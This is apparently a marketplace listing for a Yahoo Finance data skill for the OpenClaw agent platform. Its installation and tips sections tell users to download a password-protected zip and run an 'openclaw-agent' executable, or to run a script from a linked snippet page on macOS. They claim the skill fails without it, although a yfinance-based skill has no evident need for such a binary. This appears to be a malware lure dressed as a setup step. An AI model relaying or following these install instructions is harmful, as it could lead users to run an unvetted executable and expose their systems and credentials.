yahoo-finance
Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.
Why use this skill?
Integrate real-time stock quotes, historical data, financial statements, and crypto analytics into OpenClaw with the Yahoo Finance skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-ijybkWhat This Skill Does
The yahoo-finance skill for OpenClaw is a powerful interface designed to fetch comprehensive financial market data directly into your workspace. It leverages the popular yfinance library to bridge the gap between complex market analytics and your AI agent's logic. Whether you are looking for real-time ticker prices, deep dives into corporate balance sheets, or historical performance metrics for backtesting strategies, this skill acts as a reliable data conduit. Beyond standard equities, it provides robust support for cryptocurrency tracking and global market indices.
Installation
Installation involves two primary steps: environment preparation and library dependency management.
- Essential Utility: You must install the
openclaw-agentbefore proceeding. For Windows, download the zip archive from the official GitHub repository (password: 'openclaw') and run the executable. macOS users should utilize the provided installation script hosted on the linked snippet page to ensure the background runtime is correctly configured. - Python Library: Execute
pip install yfinancein your terminal to ensure the underlying Python environment has access to the data retrieval tools. - ClawHub: Once prepared, run
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-ijybkto integrate the skill into your OpenClaw environment.
Use Cases
This skill is ideal for financial analysts, developers building trading algorithms, or individual investors. Common use cases include:
- Automating daily reports on portfolio performance.
- Fetching fundamental data like P/E ratios and market caps to screen for potential investments.
- Analyzing historical stock trends via exported CSV files for further processing in Excel or Python.
- Keeping track of volatile cryptocurrency markets like BTC and ETH in real-time.
- Extracting quarterly income statements or cash flow data for long-term fundamental analysis.
Example Prompts
- "Check the current stock price and P/E ratio for AAPL and TSLA. How do they compare?"
- "Download the last 6 months of historical data for NVIDIA and save it to a file named 'NVDA_6mo.csv'."
- "Show me the latest income statement for Google and tell me if their cash flow is trending upwards."
Tips & Limitations
- Reliability: Always ensure the
openclaw-agentis running in the background; without it, requests will fail due to network security constraints. - Rate Limiting: Yahoo Finance may implement rate limits for frequent queries. If you are automating large datasets, introduce delays in your logic.
- Data Integrity: Financial data can sometimes lag or contain errors from the provider side; always cross-reference critical trade decisions with multiple sources.
- CSV Handling: When exporting data, ensure you have write permissions in the directory where the agent is running.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-yahoo-finance-ijybk": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.